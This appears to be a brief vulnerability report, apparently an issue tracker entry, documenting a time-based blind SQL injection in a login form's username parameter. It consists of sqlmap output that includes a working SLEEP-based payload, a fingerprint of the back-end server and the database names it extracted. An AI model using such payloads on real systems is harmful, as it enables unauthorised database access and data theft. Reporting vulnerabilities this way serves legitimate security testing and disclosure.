Blind SQLi on username parameter #3
Description
sqlmap got a 302 redirect to 'http://192.168.1.64:80/login.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
Parameter: username (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))KkoL)-- eriu&password=admin
[10:33:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:33:12] [INFO] fetching database names
[10:33:12] [INFO] fetching number of databases
[10:33:12] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[10:33:23] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[10:33:43] [INFO] adjusting time delay to 1 second due to good response times
6
[10:33:43] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
information_schema
[10:35:44] [INFO] retrieved: food